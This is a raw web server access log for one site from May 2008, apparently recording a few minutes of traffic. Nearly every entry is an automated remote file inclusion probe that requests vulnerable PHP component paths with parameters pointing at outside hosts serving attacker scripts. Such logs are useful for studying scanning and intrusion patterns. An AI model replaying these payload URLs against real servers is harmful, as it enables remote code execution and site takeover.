62.99.192.29 - - [29/May/2008:11:37:02 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:05 -0700] "GET /logs/access_080312.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:37:16 -0700] "GET /logs//learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:37:16 -0700] "GET //learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:37:20 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:37:21 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:37:24 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:28 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.204.43 - - [29/May/2008:11:37:28 -0700] "GET /logs/access_080327.log//////?mosConfig_absolute_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:29 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:29 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:39 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:39 -0700] "GET //skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:37:40 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:11:37:41 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:37:41 -0700] "GET /logs/access_080102.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:11:37:43 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:11:37:51 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:11:38:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:11:38:03 -0700] "GET //skin/zero_vote/error.php?dir=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:38:09 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:38:15 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:38:19 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:38:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:38:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.138.166 - - [29/May/2008:11:38:30 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:38:43 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:38:44 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:38:44 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:38:47 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:38:48 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:38:48 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:39:14 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [29/May/2008:11:39:14 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:39:32 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:39:32 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:39:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:39:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [29/May/2008:11:39:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:39:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:11:39:59 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:40:04 -0700] "GET /logs//learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [29/May/2008:11:40:04 -0700] "GET //learnPath/include/scormExport.inc.php?includePath=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:40:07 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:40:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:40:13 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:40:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:40:18 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:40:19 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.251.172 - - [29/May/2008:11:40:46 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:41:09 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:41:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:11:41:11 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:41:20 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:41:20 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:11:41:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:11:41:38 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:11:41:48 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:41:51 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:41:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:41:51 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:42:03 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:42:06 -0700] "GET /logs/access_080216.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:42:06 -0700] "GET /newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:11:42:07 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:42:07 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:42:07 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:11:42:07 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:11:42:17 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:11:42:17 -0700] "GET /newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:11:42:17 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:42:26 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:42:26 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:42:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:42:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:11:42:28 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.202.2.230 - - [29/May/2008:11:42:35 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.230 - - [29/May/2008:11:42:35 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.230 - - [29/May/2008:11:42:35 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:11:42:36 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.135 - - [29/May/2008:11:42:36 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:42:47 -0700] "GET /impex/ImpExData.php?systempath=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:42:47 -0700] "GET /logs/impex/ImpExData.php?systempath=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:42:48 -0700] "GET /logs/impex/ImpExData.php?systempath=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.47.201.117 - - [29/May/2008:11:42:48 -0700] "GET /impex/ImpExData.php?systempath=http://www.geocities.com/koeluna/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:43:04 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:43:04 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:11:43:04 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:17 -0700] "GET /logs/access_080209.log//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:20 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:20 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:26 -0700] "GET /logs/access.log//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:35 -0700] "GET //index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 5001 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:36 -0700] "GET /logs//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:43:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:43:42 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:11:43:43 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:45 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:48 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:49 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:54 -0700] "GET /logs/access_080225.log//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:54 -0700] "GET //lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:43:55 -0700] "GET /logs//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:11:43:57 -0700] "GET /logs/access_080312.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:11:44:02 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.36.247 - - [29/May/2008:11:44:02 -0700] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:11:44:28 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:11:44:28 -0700] "GET /newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:11:44:28 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:44:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:11:44:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:11:44:54 -0700] "GET /logs/access_080308.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
